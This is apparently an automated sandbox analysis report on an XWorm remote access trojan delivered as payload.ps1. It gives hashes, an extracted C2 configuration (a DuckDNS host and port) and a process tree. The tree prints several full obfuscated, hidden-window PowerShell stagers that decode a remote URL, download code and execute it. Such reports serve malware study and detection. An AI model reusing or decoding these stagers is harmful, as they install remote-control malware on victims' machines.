Analysis
-
max time kernel
75s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
-
submitted
16-03-2024 03:37
General
-
Target
payload.ps1
-
Size
14.0MB
-
MD5
aa2fcbb3e1b8c195777d2a9c5af28af1
-
SHA1
057f1e81fa914277ecd8d0eea7e569e399b15c6a
-
SHA256
52105d8dcacb31d69a4a64d1a24ccd82662f314b7917d7daf05fe4eafe7723e4
-
SHA512
a6e5f81abdb6ef691d7d36651b8c1e4a357e7dc8cca3650c8fbbb7024094194cfb1844aae5d6e147bafc7d918277e56dcdd14cf8b1e185f4c4ada4fe5388084a
-
SSDEEP
24576:r2lhbBXrpmxiycVY6wBrBZTtgf3DqmTx1eSX2e+h8BC2mstEM92DF/iHCeoiz+6l:ejT0H4LvIpkM4aG2bZ
Score
10/10
Malware Config
Extracted
Family
xworm
Version
3.1
C2
jdokds.duckdns.org:8895
Mutex
fR94ukDUyBXXff7e
Attributes
-
install_file
USB.exe
aes.plain
Signatures
-
Detect Xworm Payload 3 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
Xworm
Xworm is a remote access trojan written in C#.
-
Drops file in System32 directory 12 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 26 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\payload.ps12⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\notepad.exeC:\Windows\System32\notepad.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vewvps.bat" "3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "++$Dirigomotor;++$Dirigomotor;$Dirigomotor=$Dirigomotor-1;Function forladtheds ($Myrothamnaceae227){$Dork=5;$Dork++;For($travertinen=5; $travertinen -lt $Myrothamnaceae227.Length-1; $travertinen+=$Dork){$Coatimundi = 'substring';$Circumviate=$Myrothamnaceae227.$Coatimundi.Invoke($travertinen, 1);$Rdstensmures=$Rdstensmures+$Circumviate}$Rdstensmures;}$Linjefags=forladtheds 'Kl.jnhO hertOptoptFicuspNe.spsBered: pidd/ Fi,e/,ecidkHete.iBenvvs ,jeraBedranAlumnbS nareFor.st megahCel.baCohomk Supe. Tingc H,emoLo ogm Proc/Biso.PAfsyr/ TrepSSupe.lFileriAffjedOutraeTer uaOfficb ove,l rchdyDiaba1 Seam4,ekun7udst,.prem.sYummimOrthoi P eb ';$Paasmringer220=$Linjefags.split([char]62);$Linjefags=$Paasmringer220[0];$Skridnings=forladtheds 'ReinciAfluse.itchxeiden ';$Decelererende = forladtheds 'Backi\VetoesB,ugeyIndags yperwBehndoReg.owLogic6Spise4Argal\ .iltWCarpeif uffnMes idTil,oo.estewFolk,s Re,uP Ep,soraisiw Thine ,orurMr stSHo,rihUncomeEightlBuelalTrawl\RabunvRered1Overp.Toftl0 S ra\Nede.pSlumroewhoww Elo.eTr,firKom asPa,athScyt.em.rial SliblN uri.va.dmeStd,rx SwaleSkyld ';.($Skridnings) (forladtheds 'Al.ue$PhotoSDem.ok Phleo ygedv KikasFryselUdv,eoU dbrt.cantt PhleeLy,sksFogle= Sag,$u.moreGymnon Di.gv.onpr:P pirwActiniLejemnOrdredstagsiUng.rr Flu. ') ;.($Skridnings) (forladtheds 'Tezwe$ Ha dDAc,eaeUnsu.cD.sgeed,agelVintee Carnr urste ,kderDebate EccrnHollndRazoreIn bl=git,r$FinanSUdviskL gego Galtv PunksVelbelDobbeoBouletForvrtSikkeeRunassJussi+ Supe$StagiDC riae Laa cSjlereForgrlConcreErhver achieUnabur Ashoe Fo anEslabdGenneeMicro ') ;.($Skridnings) (forladtheds ',azar$ForsvPSandaaT tarp ntraypodoprGau tofuzedl Ko,eoPseudgPlaisi K.emcCsaria Soo lJewes ,erv=Ca ma endbo(s,riv( S elg tiftwArbejm,ndeciCo.fo Papirw,begri Br fnPigwa3ene.i2Skat,_ IllepUbi.trDiapeoMi,tecKerneeDuerisSt.ycsBerri Keros- p.llF Byud DowntPCaulkrDo.teoir.evcLste.eSkywasAmusisBaronIOrgandAntag= Biga$Lymph{ForagPHabilIDesinD U ma} orhu)Resym.MastiCModtaoSwaggmU grfmVernaaInvesn BliddLipoiLFo.ssiKortfnCitate Rod.) .etn majon- IntesSgnedpBotanl .onni S.ertDisma Tankr[ KlovcEuc lhCr,wla Il.urRiata] Modt3 Toge4Brner ');.($Skridnings) (forladtheds 'M bol$ AizoFBrosel HernyLak et KauttTreeteAest.bBardeuLophisSnksmsAgaveeSte,orDanics R si Def l=Immeu Epih$ PrebPHofhoaOrangp Spaay vhsmrArkivoAandelSvrd,o ReargUltrailacercBlg.laTil plB.rdk[ Attr$ nterP oedsaSlamspEelpoySikkerFo,tloLnreglHaando Propgbaci.i Stadc.esteaDisoblPenta.LinolcUnculoScammuKlagen TraftS,ffi-,oorb2Lves.] Surr ');.($Skridnings) (forladtheds 'Contr$SiphoM ecomaHoboecRejserVred,oKrstebAntonifidaco AsmetLe eve Per.=Amidi( BrodT Sup.eBeskrs LagetSigjn- UngrPre.tia sp,jt K rshFa en Traga$AlumiDInsureReturcsaliseOpslilHerreeFordlrExhibehabilr itnaeDisprn NedsdUpaakePange) Baa Ch,ot-panteASmakknInterdLacer Retol(Brors[taxafIKr,dinGenertNettoPHyattt Op,orGrint] myth:Lipol:k,asssHavegiNongezMisbeeSuffr Sebk-TonekeHjme qBussi P,lyt8Senso)Peris ') ;if ($Macrobiote) {.$Decelererende $Flyttebussers;} else {;$Anskueligere=forladtheds 'OrdklS DuentBuf oaKort rAciditUnall-ForesB.elafiU,levtPaleos InopT.ormarPerseaYndlinDagbosAlfalf Bigae E,isrIsenm Aarga-HarmiS DebuoSousaua.gulrhuslic KongeCorag Vivis$HaarsLNettoiRegulnLicenjBibliePlissfKorroaBardygUn ens,ands Bl ff-FryseDNighleBe.yvsB ndotRouleiEnrernEkstaaPresptCera.iLogo,o Faminresto nucle$fermeS D.uekFornaoDiskuvGtheds MowslAversoRealitGenant AandeUdgansAquaf ';.($Skridnings) (forladtheds 'Che.s$MindrS Tid.k CryioDysphvUnvapsAntislCarpooFarsit El.ct ConceAldersVapou=incre$FormeeTullenSkamsvSoe.e:Ab.tiaResorpRveripSidendNonoba Re,ntLaterasekst ') ;.($Skridnings) (forladtheds 'KaalhIAbnormUd ivppipesoKalenrTambut .eal-O.ersMFecg.o U pndMangfuViru,lH ppee fors pearlB KliniUnloatBalansProraTTurq.r.entraKontonbre,ps PolyfO.ruseKapitr Citi ') ;$Skovslottes=$Skovslottes+'\Tabulatorkodernes.Aid';while (-not $Ameliorators) {.($Skridnings) (forladtheds 'Inspr$S,eniAFeltbmIntereGabesl,omeriSe,eloNedskrKvinda RepotGlas oFana rPeponsForga= Pres(Ba.neTP goseTumulsForantCopal- s.arPDe rtaAarhut RevehFreel Sprog$ ,mbaS Sig.kBabe,oE.iopvoutthsRevellOperaoHjerntOprett Allwe Be,rsvenst)Epit ') ;.($Skridnings) $Anskueligere;.($Skridnings) (forladtheds 'JulenS g actUnaccaDire.r Da.etPoolr-te.epSValgels xtae .enreAf.rfpUnwes Overs5Downf ');$Linjefags=$Paasmringer220[$Underekstremitetens++%$Paasmringer220.count];}.($Skridnings) (forladtheds 'Atoll$prereiSt otb S eci GestnUndu.aLaicisQuins E,art=Chris Vol,G HemoeMyatotOutsl-PinniCbe.kfo Animnmarant LataepalagnCallot Gabe Band$ EnkrS KontkDed,ao Gru v WheesG,stul,mklao AfhntForehtSoff eRhebos neur ');.($Skridnings) (forladtheds ' .nfo$tresaCTu gmiBesttrFrig.cG,neauEntallSquigitou hnWife 1Anven6Anody0 Men G.ogn= Udr, antic[AntimSHimatyArchps Pan.tOv,rleSikkemS.mul.AikucCBe,cooMaizenNouvev Kampe.nvolr IdiotGrung]Under:Yffri:Haa.dF JodorSkuldoS rmfmEndotBHyposaSprogsDuitse Ti.s6Undi.4Me chSPartntSu jur requiU,planAggragMods ( Brom$U komi lngebPseudi alennBjlkeaGeomesLameb)Zoner ');.($Skridnings) (forladtheds 'Overs$Regn OMussarSemimdRemearCrapueOppusb Ggese,entrhatresoYaourlTetrod PounnSgtemi,indin Afskg.hmer Nagle=Gynec Monan[BarbeSNondryadgans Haemt onoeTyvekm Patr. BetoT SukkeForbrxFatidtClamm.bou uEGermanInv lcBlomso xperdSmalsibasarnSalgsgEn,ro]rumpe:Thuli:Zoox.AOverpSToxicCDeinkI CupiI Fred.BredtG Letge.ushitByggeSP,tartStephr udv.iRen,jn.nkemgInd i( gata$R.ndmCogygii.nebir SnrlcKobbeuIn,erlHirs,iLo ftn Dryp1Carbu6,anes0 Begy)Bolig ');.($Skridnings) (forladtheds 'Kl es$EndueKKashmaSegmekGenneeFritum BejloCorronunfieo Tabus D,nl=Ompha$Sid,sOTenorr FlledUnfi.rAromaePotshbShakiePot mhpashaoSc onl SaccdIdeatn ha ti PhagnEnyasgCadet.ErritsHer.iuRokkebByggesrea,itpebakrOverliGarnvnTypotgGurni(P,rid3 B.an1ar.ej3Kdere3Minim5Uncur9 heep,C non2unpre6Uvanl8Kro.s7indlu0Briss)O.def ');.($Skridnings) $Kakemonos;}"4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "++$Dirigomotor;++$Dirigomotor;$Dirigomotor=$Dirigomotor-1;Function forladtheds ($Myrothamnaceae227){$Dork=5;$Dork++;For($travertinen=5; $travertinen -lt $Myrothamnaceae227.Length-1; $travertinen+=$Dork){$Coatimundi = 'substring';$Circumviate=$Myrothamnaceae227.$Coatimundi.Invoke($travertinen, 1);$Rdstensmures=$Rdstensmures+$Circumviate}$Rdstensmures;}$Linjefags=forladtheds 'Kl.jnhO hertOptoptFicuspNe.spsBered: pidd/ Fi,e/,ecidkHete.iBenvvs ,jeraBedranAlumnbS nareFor.st megahCel.baCohomk Supe. Tingc H,emoLo ogm Proc/Biso.PAfsyr/ TrepSSupe.lFileriAffjedOutraeTer uaOfficb ove,l rchdyDiaba1 Seam4,ekun7udst,.prem.sYummimOrthoi P eb ';$Paasmringer220=$Linjefags.split([char]62);$Linjefags=$Paasmringer220[0];$Skridnings=forladtheds 'ReinciAfluse.itchxeiden ';$Decelererende = forladtheds 'Backi\VetoesB,ugeyIndags yperwBehndoReg.owLogic6Spise4Argal\ .iltWCarpeif uffnMes idTil,oo.estewFolk,s Re,uP Ep,soraisiw Thine ,orurMr stSHo,rihUncomeEightlBuelalTrawl\RabunvRered1Overp.Toftl0 S ra\Nede.pSlumroewhoww Elo.eTr,firKom asPa,athScyt.em.rial SliblN uri.va.dmeStd,rx SwaleSkyld ';.($Skridnings) (forladtheds 'Al.ue$PhotoSDem.ok Phleo ygedv KikasFryselUdv,eoU dbrt.cantt PhleeLy,sksFogle= Sag,$u.moreGymnon Di.gv.onpr:P pirwActiniLejemnOrdredstagsiUng.rr Flu. ') ;.($Skridnings) (forladtheds 'Tezwe$ Ha dDAc,eaeUnsu.cD.sgeed,agelVintee Carnr urste ,kderDebate EccrnHollndRazoreIn bl=git,r$FinanSUdviskL gego Galtv PunksVelbelDobbeoBouletForvrtSikkeeRunassJussi+ Supe$StagiDC riae Laa cSjlereForgrlConcreErhver achieUnabur Ashoe Fo anEslabdGenneeMicro ') ;.($Skridnings) (forladtheds ',azar$ForsvPSandaaT tarp ntraypodoprGau tofuzedl Ko,eoPseudgPlaisi K.emcCsaria Soo lJewes ,erv=Ca ma endbo(s,riv( S elg tiftwArbejm,ndeciCo.fo Papirw,begri Br fnPigwa3ene.i2Skat,_ IllepUbi.trDiapeoMi,tecKerneeDuerisSt.ycsBerri Keros- p.llF Byud DowntPCaulkrDo.teoir.evcLste.eSkywasAmusisBaronIOrgandAntag= Biga$Lymph{ForagPHabilIDesinD U ma} orhu)Resym.MastiCModtaoSwaggmU grfmVernaaInvesn BliddLipoiLFo.ssiKortfnCitate Rod.) .etn majon- IntesSgnedpBotanl .onni S.ertDisma Tankr[ KlovcEuc lhCr,wla Il.urRiata] Modt3 Toge4Brner ');.($Skridnings) (forladtheds 'M bol$ AizoFBrosel HernyLak et KauttTreeteAest.bBardeuLophisSnksmsAgaveeSte,orDanics R si Def l=Immeu Epih$ PrebPHofhoaOrangp Spaay vhsmrArkivoAandelSvrd,o ReargUltrailacercBlg.laTil plB.rdk[ Attr$ nterP oedsaSlamspEelpoySikkerFo,tloLnreglHaando Propgbaci.i Stadc.esteaDisoblPenta.LinolcUnculoScammuKlagen TraftS,ffi-,oorb2Lves.] Surr ');.($Skridnings) (forladtheds 'Contr$SiphoM ecomaHoboecRejserVred,oKrstebAntonifidaco AsmetLe eve Per.=Amidi( BrodT Sup.eBeskrs LagetSigjn- UngrPre.tia sp,jt K rshFa en Traga$AlumiDInsureReturcsaliseOpslilHerreeFordlrExhibehabilr itnaeDisprn NedsdUpaakePange) Baa Ch,ot-panteASmakknInterdLacer Retol(Brors[taxafIKr,dinGenertNettoPHyattt Op,orGrint] myth:Lipol:k,asssHavegiNongezMisbeeSuffr Sebk-TonekeHjme qBussi P,lyt8Senso)Peris ') ;if ($Macrobiote) {.$Decelererende $Flyttebussers;} else {;$Anskueligere=forladtheds 'OrdklS DuentBuf oaKort rAciditUnall-ForesB.elafiU,levtPaleos InopT.ormarPerseaYndlinDagbosAlfalf Bigae E,isrIsenm Aarga-HarmiS DebuoSousaua.gulrhuslic KongeCorag Vivis$HaarsLNettoiRegulnLicenjBibliePlissfKorroaBardygUn ens,ands Bl ff-FryseDNighleBe.yvsB ndotRouleiEnrernEkstaaPresptCera.iLogo,o Faminresto nucle$fermeS D.uekFornaoDiskuvGtheds MowslAversoRealitGenant AandeUdgansAquaf ';.($Skridnings) (forladtheds 'Che.s$MindrS Tid.k CryioDysphvUnvapsAntislCarpooFarsit El.ct ConceAldersVapou=incre$FormeeTullenSkamsvSoe.e:Ab.tiaResorpRveripSidendNonoba Re,ntLaterasekst ') ;.($Skridnings) (forladtheds 'KaalhIAbnormUd ivppipesoKalenrTambut .eal-O.ersMFecg.o U pndMangfuViru,lH ppee fors pearlB KliniUnloatBalansProraTTurq.r.entraKontonbre,ps PolyfO.ruseKapitr Citi ') ;$Skovslottes=$Skovslottes+'\Tabulatorkodernes.Aid';while (-not $Ameliorators) {.($Skridnings) (forladtheds 'Inspr$S,eniAFeltbmIntereGabesl,omeriSe,eloNedskrKvinda RepotGlas oFana rPeponsForga= Pres(Ba.neTP goseTumulsForantCopal- s.arPDe rtaAarhut RevehFreel Sprog$ ,mbaS Sig.kBabe,oE.iopvoutthsRevellOperaoHjerntOprett Allwe Be,rsvenst)Epit ') ;.($Skridnings) $Anskueligere;.($Skridnings) (forladtheds 'JulenS g actUnaccaDire.r Da.etPoolr-te.epSValgels xtae .enreAf.rfpUnwes Overs5Downf ');$Linjefags=$Paasmringer220[$Underekstremitetens++%$Paasmringer220.count];}.($Skridnings) (forladtheds 'Atoll$prereiSt otb S eci GestnUndu.aLaicisQuins E,art=Chris Vol,G HemoeMyatotOutsl-PinniCbe.kfo Animnmarant LataepalagnCallot Gabe Band$ EnkrS KontkDed,ao Gru v WheesG,stul,mklao AfhntForehtSoff eRhebos neur ');.($Skridnings) (forladtheds ' .nfo$tresaCTu gmiBesttrFrig.cG,neauEntallSquigitou hnWife 1Anven6Anody0 Men G.ogn= Udr, antic[AntimSHimatyArchps Pan.tOv,rleSikkemS.mul.AikucCBe,cooMaizenNouvev Kampe.nvolr IdiotGrung]Under:Yffri:Haa.dF JodorSkuldoS rmfmEndotBHyposaSprogsDuitse Ti.s6Undi.4Me chSPartntSu jur requiU,planAggragMods ( Brom$U komi lngebPseudi alennBjlkeaGeomesLameb)Zoner ');.($Skridnings) (forladtheds 'Overs$Regn OMussarSemimdRemearCrapueOppusb Ggese,entrhatresoYaourlTetrod PounnSgtemi,indin Afskg.hmer Nagle=Gynec Monan[BarbeSNondryadgans Haemt onoeTyvekm Patr. BetoT SukkeForbrxFatidtClamm.bou uEGermanInv lcBlomso xperdSmalsibasarnSalgsgEn,ro]rumpe:Thuli:Zoox.AOverpSToxicCDeinkI CupiI Fred.BredtG Letge.ushitByggeSP,tartStephr udv.iRen,jn.nkemgInd i( gata$R.ndmCogygii.nebir SnrlcKobbeuIn,erlHirs,iLo ftn Dryp1Carbu6,anes0 Begy)Bolig ');.($Skridnings) (forladtheds 'Kl es$EndueKKashmaSegmekGenneeFritum BejloCorronunfieo Tabus D,nl=Ompha$Sid,sOTenorr FlledUnfi.rAromaePotshbShakiePot mhpashaoSc onl SaccdIdeatn ha ti PhagnEnyasgCadet.ErritsHer.iuRokkebByggesrea,itpebakrOverliGarnvnTypotgGurni(P,rid3 B.an1ar.ej3Kdere3Minim5Uncur9 heep,C non2unpre6Uvanl8Kro.s7indlu0Briss)O.def ');.($Skridnings) $Kakemonos;}"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pcetiy.cmd" "3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "++$troldtj;++$troldtj;$troldtj=$troldtj-1;Function ordfattigere ($Blikdaasers){$Chuttie=5;$Chuttie++;For($Blindlandingernes243=5; $Blindlandingernes243 -lt $Blikdaasers.Length-1; $Blindlandingernes243+=$Chuttie){$Strongness = 'substring';$Springals=$Blikdaasers.$Strongness.Invoke($Blindlandingernes243, 1);$Turdes=$Turdes+$Springals}$Turdes;}$Chiropompholyx=ordfattigere 'Mar khAme.itPyroptSk,depChewssMedul:Dissi/Lejek/ yrelkTympaiPreacsVandsa BagtnFremsb elsoeH,acitIn.rahReappacrownk Her .Ne,vecBalanoSi,ulm Omst/Ud rePKonto/FolkePA rsprBengaeImbecaRaciscPsychk Misfn DignoPalinw SlutlNthsteScreedSkt egOveriiFldenn arrog hjer.I.stajSpirop waitb ower ';$Iconomatically=$Chiropompholyx.split([char]62);$Chiropompholyx=$Iconomatically[0];$amnigenia=ordfattigere 'CommeiIm,taeWillyxSpind ';$Dambrikker = ordfattigere 'Margo\Spejls,kalpyAsth,sgurlywCa.dioE herwOxida6Scyph4Vokat\or,hoWTransi,jaskn Stj.dSahido SekawUnscrsTru dPkartooLovhjw Tr.lereconrThru,STrophhSjkleeTerril BlselOplge\De,orvAft,r1Dromm.Supe,0K.ntr\BurespSidehoPortiwTyrane HyperT,uchsAkkomhAfvrge hrislFornul t.ar.KalveeDe.arxcirk.e Qu l ';.($amnigenia) (ordfattigere 'Depon$UdvikI .aper PapyiV serd,ibblo ompacTo,alyO errtArmeneTrlbe= U,al$ IlgneZimminAfsonvUnest: Pai wP nteiSkravnsettldCoopti Retor Hund ') ;.($amnigenia) (ordfattigere 'Stale$HippoD Pblea,nmormSol,nbUnap rDecusiSamstkAxelskAfsene Silir Skin= Hold$GenskIKodekr Dieui Fortdopobao Ser.cUdda,y ,evatBemureBurr,+ S.ll$ProgrDMicroaFrus.m.imoub Taxar ppliiLa,erkCornak alkoeForsir.ndeg ') ;.($amnigenia) (ordfattigere 'K,itt$Slbebs Dotthindvii BracrPasher ,ersiSpagen T algOmsta Demon=Bol.r Sanse( nrev(LucragIndorwChefim,arriiTrave SludgwSammei DeicnOlep 3Hakk,2Ko se_demimpFe.lfrCosmooOgriscTempoeSena,sBaggrsSordi Lanse- AngrFVenti InlacPT,ansrAffilo.taarcOverreIndissThyros MourIStramdHydro=Dyste$.ulet{ LipsPForstICorsaDDefek} ti y)Organ. KonkCEjendoExercm Pl dm arasaSlotsnKom udRstetLLy.thiRudeknVrikke Efar)Benve Rudim-Longws askepFamillKlasbiBonait Str. Tref[PlaticAfrimh,uppeaSi plrSko s]Expla3 umfa4Oua k ');.($amnigenia) (ordfattigere 'Rehng$An.leSL,udetelae,iSen.ulHoldeeIridie,aketmRinncn Pande ConvrEadiinMoneteA,bej ,gent=Bu,kl Fuldk$RadbrsUng.ohInt eiSkov r Diosr F rtiLej,enDobbeg Daar[Fyrre$hempbsInddahTittei Euc,rLipo.rclassi Azonn pidsg Prsi.CoseicPerusoUn,eau Likvn,dmint Fina-proap2E vrk] iceg ');.($amnigenia) (ordfattigere 'Rett.$ eechGDeadwaEn amvannamoStrstt.rigst Ref.eSvarsrdishanInte eDotes=Gullb(Steg T.nporejule.s ,aletUnapp-Hela PCams.aStenftStouth Pote M dvi$enhe.DJunglaHor.umParepbr.caprVederi esukPresukHannieBrachr Tykk)Sco.n Nonde-An.irACustonNonpedPolab De ar(Corkl[SakkeIUndern Postt OomaP urlitSpindrAntag]Luft :aurae:u trasrouleiGypsyzVi seeHalmf ,ille-TaageeBouilqPrale Coel8Nonim)Agast ') ;if ($Gavotterne) {.$Dambrikker $Stileemnerne;} else {;$Ansaa=ordfattigere 'SociiSHypertUnm,ra NeurrB,fagtFalse-VandlBem,griLgplatPaup s SamiTTransr Fanea .ntenSom.esKr.gsf R.imeBetinrSi is Kysen- SrbaSFljteoSygebu Blanr Sat,cDe treAngek Malo$Pe icC MisohRevisiComplr H lfo,eredp,aftlo pprmVentrpConsthUdvaloE iphl,lobiyperifx T kt Besk- MurmDVina,eIndurs,krivtReprsiGir,lnOxysaa LevotCenteiKarbuoSjakbnGaunt Stat$ Ge,vIunlaurDatabiCo.indLeukoo,atroc .osiyHalo.tMorg.e erv ';.($amnigenia) (ordfattigere ',ppor$CycloI.jssorTilfriCal odOutc oQuerccLederybikintCarpeeAutol=Dent.$B.indeTempin,undhvfjort:Ondula Vgk.pIdo,ipLi eddHyl.ea .reetReincaCu,ub ') ;.($amnigenia) (ordfattigere 'P,oviIImpacmKvartp S aio,yperrIrreft Xant-DitzeMFrikvo As.rdsu eruPac.hlPapire ,ewf FrelsBVilmaiSel.ktdissesoxydeT,onearSenioaHygronDiddisCoun,fS,rmfeStetirDusti ') ;$Iridocyte=$Iridocyte+'\Passionful.Gen';while (-not $Flushingly) {.($amnigenia) (ordfattigere 'Teleo$ PolyFDronnlVacuouRi iksV,ndehVels.i ashn robrgPhlebl tapyVr.wi=Ekspe( P.nnTPhot.eBetjesEm.ratCholo-E strP mdenaUddantP nsihTrest Rec.r$N.ncoISloggrRutsciKrnked Ge,moKapitc GnawyBldnitForlaeHm,el)Skaar ') ;.($amnigenia) $Ansaa;.($amnigenia) (ordfattigere ' befoSOveretSylteaUkontr alystRaads-R mitSBonellAabyheTil ieNon,cpSkyla Supe,5Subca ');$Chiropompholyx=$Iconomatically[$Cirkusene++%$Iconomatically.count];}.($amnigenia) (ordfattigere 'Forma$Elef MAnisoaStocknMiljtdUnbashVulkaa In.uf .rantPamfliSlugvgFrumeeKosm, Taskl= umbe AbnorGDer oeHovedtCatac-MilieCFors,o BlehnTertit SkodekolponKalkutEpi,r Impar$InveiINa,err Mto.i,ushedBukkeo Hertc Ur ny.ygmetminc,e Akti ');.($amnigenia) (ordfattigere 'Ak.io$ ,ormCAuto.oOrbieuTndehnRubelt Tidse M grr Noraa heavdMolbovCarp.iMishac IncreTresp Wh t=R.tte garde[Pel,pSAb loyCosm ssup rt SlrueValmum ekli.EksplCFremmoSurann rundv Strae,niverDep at St.r]Bibli:,rkni:GraveFMaldorModa,oKapacm ThroBSkjala .arcs,ndgie kovb6Phth,4SnortSRindetImde rCrossi MetanUdspigMol h(Fes,r$ OutbMVinklaPo pinDesped Kickh voldaK,ncefArbejt NatuiProblg egnee Krig) Fri. ');.($amnigenia) (ordfattigere 'A,ela$Co,abJInroceRingkeHumanpDomineKnippdJungm ,alu=S,ids Overo[K,lymS pusly d,pusR,vestSashaePimplmBack..CollaTSk.ive De,oxSupertTrefa.ForsiE CasunNecescSuperoAgt.rdfait iHelepn Tredg Or h]Vr.is:Hvdin: BrneASmag,S CeleCTrosrI subtIPost,.DikteGTf,eneSmalstMinesSTalectMis.drQuinqiByfesnF,rmagrovdy( Unco$SynodCT lbao ,mpeuDisconprop,t gneere atrKonfea He,tdPodesvEst,riSt.enc Af,re.ssev) Vol, ');.($amnigenia) (ordfattigere 'Preco$ ersrre,eroMycteaDommes EnretSemip=nondi$S,ansJ E vreUimodeBedemp DickeF,lmtdFasci.Verdessc louSpgelbRejsesStriktJac.frShafti His,nAr cogTankl( ube3Apron1polyp9Blret2Hom,t7Risic9Bortf,Slutn2Parti4Linde7Mater0Ke,os8U,pmr)Bikse ');.($amnigenia) $roast;}"4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "++$troldtj;++$troldtj;$troldtj=$troldtj-1;Function ordfattigere ($Blikdaasers){$Chuttie=5;$Chuttie++;For($Blindlandingernes243=5; $Blindlandingernes243 -lt $Blikdaasers.Length-1; $Blindlandingernes243+=$Chuttie){$Strongness = 'substring';$Springals=$Blikdaasers.$Strongness.Invoke($Blindlandingernes243, 1);$Turdes=$Turdes+$Springals}$Turdes;}$Chiropompholyx=ordfattigere 'Mar khAme.itPyroptSk,depChewssMedul:Dissi/Lejek/ yrelkTympaiPreacsVandsa BagtnFremsb elsoeH,acitIn.rahReappacrownk Her .Ne,vecBalanoSi,ulm Omst/Ud rePKonto/FolkePA rsprBengaeImbecaRaciscPsychk Misfn DignoPalinw SlutlNthsteScreedSkt egOveriiFldenn arrog hjer.I.stajSpirop waitb ower ';$Iconomatically=$Chiropompholyx.split([char]62);$Chiropompholyx=$Iconomatically[0];$amnigenia=ordfattigere 'CommeiIm,taeWillyxSpind ';$Dambrikker = ordfattigere 'Margo\Spejls,kalpyAsth,sgurlywCa.dioE herwOxida6Scyph4Vokat\or,hoWTransi,jaskn Stj.dSahido SekawUnscrsTru dPkartooLovhjw Tr.lereconrThru,STrophhSjkleeTerril BlselOplge\De,orvAft,r1Dromm.Supe,0K.ntr\BurespSidehoPortiwTyrane HyperT,uchsAkkomhAfvrge hrislFornul t.ar.KalveeDe.arxcirk.e Qu l ';.($amnigenia) (ordfattigere 'Depon$UdvikI .aper PapyiV serd,ibblo ompacTo,alyO errtArmeneTrlbe= U,al$ IlgneZimminAfsonvUnest: Pai wP nteiSkravnsettldCoopti Retor Hund ') ;.($amnigenia) (ordfattigere 'Stale$HippoD Pblea,nmormSol,nbUnap rDecusiSamstkAxelskAfsene Silir Skin= Hold$GenskIKodekr Dieui Fortdopobao Ser.cUdda,y ,evatBemureBurr,+ S.ll$ProgrDMicroaFrus.m.imoub Taxar ppliiLa,erkCornak alkoeForsir.ndeg ') ;.($amnigenia) (ordfattigere 'K,itt$Slbebs Dotthindvii BracrPasher ,ersiSpagen T algOmsta Demon=Bol.r Sanse( nrev(LucragIndorwChefim,arriiTrave SludgwSammei DeicnOlep 3Hakk,2Ko se_demimpFe.lfrCosmooOgriscTempoeSena,sBaggrsSordi Lanse- AngrFVenti InlacPT,ansrAffilo.taarcOverreIndissThyros MourIStramdHydro=Dyste$.ulet{ LipsPForstICorsaDDefek} ti y)Organ. KonkCEjendoExercm Pl dm arasaSlotsnKom udRstetLLy.thiRudeknVrikke Efar)Benve Rudim-Longws askepFamillKlasbiBonait Str. Tref[PlaticAfrimh,uppeaSi plrSko s]Expla3 umfa4Oua k ');.($amnigenia) (ordfattigere 'Rehng$An.leSL,udetelae,iSen.ulHoldeeIridie,aketmRinncn Pande ConvrEadiinMoneteA,bej ,gent=Bu,kl Fuldk$RadbrsUng.ohInt eiSkov r Diosr F rtiLej,enDobbeg Daar[Fyrre$hempbsInddahTittei Euc,rLipo.rclassi Azonn pidsg Prsi.CoseicPerusoUn,eau Likvn,dmint Fina-proap2E vrk] iceg ');.($amnigenia) (ordfattigere 'Rett.$ eechGDeadwaEn amvannamoStrstt.rigst Ref.eSvarsrdishanInte eDotes=Gullb(Steg T.nporejule.s ,aletUnapp-Hela PCams.aStenftStouth Pote M dvi$enhe.DJunglaHor.umParepbr.caprVederi esukPresukHannieBrachr Tykk)Sco.n Nonde-An.irACustonNonpedPolab De ar(Corkl[SakkeIUndern Postt OomaP urlitSpindrAntag]Luft :aurae:u trasrouleiGypsyzVi seeHalmf ,ille-TaageeBouilqPrale Coel8Nonim)Agast ') ;if ($Gavotterne) {.$Dambrikker $Stileemnerne;} else {;$Ansaa=ordfattigere 'SociiSHypertUnm,ra NeurrB,fagtFalse-VandlBem,griLgplatPaup s SamiTTransr Fanea .ntenSom.esKr.gsf R.imeBetinrSi is Kysen- SrbaSFljteoSygebu Blanr Sat,cDe treAngek Malo$Pe icC MisohRevisiComplr H lfo,eredp,aftlo pprmVentrpConsthUdvaloE iphl,lobiyperifx T kt Besk- 